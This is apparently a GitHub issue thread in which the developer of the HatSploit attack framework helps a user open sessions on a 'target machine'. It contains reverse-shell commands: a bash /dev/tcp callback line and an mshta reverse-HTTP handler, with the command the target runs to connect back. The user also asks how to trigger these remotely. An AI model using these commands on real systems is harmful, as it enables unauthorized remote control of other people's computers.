Great Project

[Gabl00]

I find this project very interesting and useful. was able to install and establish connections to a remote PC but I wasn't able to send commands.

could you please make an example of how to send commands after successful connections?

thanks

you are awesome brother !!

[enty8080]

Hi, @Gabl00

I am glad you liked my work. Can you send me screenshots of the terminal output or your problem?

If you have any trouble with opening an interactive session with an infected machine, you can just use sessions -l and then sessions -i <session_id>.

So, attach screenshots and here is wiki BTW.

Best regards, Ivan Nikolsky (@enty8080)

[Gabl00]

screenshot attached .. I followed the payload command here >> https://github.com/EntySec/HatSploit/wiki/HatSploit-Payloads

the connection was successful but when I tried to run a command it disconnects.. in this case, i tried to download a file image.png from the connected user.

[enty8080]

@Gabl00 What command have you entered on target system?

Because as you can see it sends RAW HTTP response.

[Gabl00]

sessions -d

perhaps if you could give an example on how to run a command to download and upload files

[enty8080]

@Gabl00 No, what command have you entered on the target machine?

Before the session has been opened. You have done something incorrectly because you are receiving an HTTP response.

[Gabl00]

sessions -d C:\Users\USERS\Desktop\image.jpg D:\Users\Desktop

[enty8080]

@Gabl00

Show me all the steps please, all commands and payload name. Also, the command that you have entered in the target terminal window before the session was opened.

[Gabl00]

you may be right on this.. perhaps something i did wrong here.. well i followed the payload instructions exactly

[enty8080]

@Gabl00 Execute this command and send me output please.

show options

[enty8080]

@Gabl00 Okay, and what have you done on target machine after you executed run?

[Gabl00]

[enty8080]

@Gabl00 Okay, and what have you done on the target machine after you executed run? Have you typed something like this on target terminal - bash &>/dev/tcp/<ip>/<port> 0>&1>

[enty8080]

@Gabl00 Looks like I found why you are no able to open proper session. You opening URL on target, but you should not do this.

[Gabl00]

@Gabl00 Looks like I found why you are no able to open proper session. You opening URL on target, but you should not do this.

Yes i opened URL on the target machine

[enty8080]

@Gabl00 Unfortunately this is not how it works.

[enty8080]

@Gabl00

Do this:

use exploit/windows/handler/mshta_reverse_http
set rhost <your_ip>
run

And then on target in cmd.exe:

mshta http://<your_ip>:8080/

Hope this will help you.

[enty8080]

@Gabl00 Sorry, I am closing this issue because there is no bug in HatSploit.

[Gabl00]

AWESOME !!!!

this works.. but then how can i run remotely this cmd on a target machine

[enty8080]

@Gabl00 Can you show me output, did cmd pop-up?

[enty8080]

@Gabl00 Also, you will not be able to use sessions -d on Windows targets because it is now supported only for Unix-like systems.

[enty8080]

@Gabl00 To save session and continue working in HatSploit, type quit and then if you would like to interact it again type sessions -i 0

[Gabl00]

[enty8080]

@Gabl00 Now, just type quit to exit interactive mode.

[Gabl00]

ok, thanks alot man, i appreciate this alot .. this app is just beautiful and very useful for remotely connecting with work colleagues or clients to for troubleshooting etc

does it work with a GUI ?

[enty8080]

@Gabl00 I am working on this project alone and it is only on early stages of development, so there is no GUI at all, I tried developing this one - https://github.com/EntySec/HatBoard, but it is really unstable right now.

[Gabl00]

this is awesome.. im going to set it ..

perhaps you can add your wallets for donations ..

I'm really interested in your works

[enty8080]

@Gabl00 Thank you for your interest :)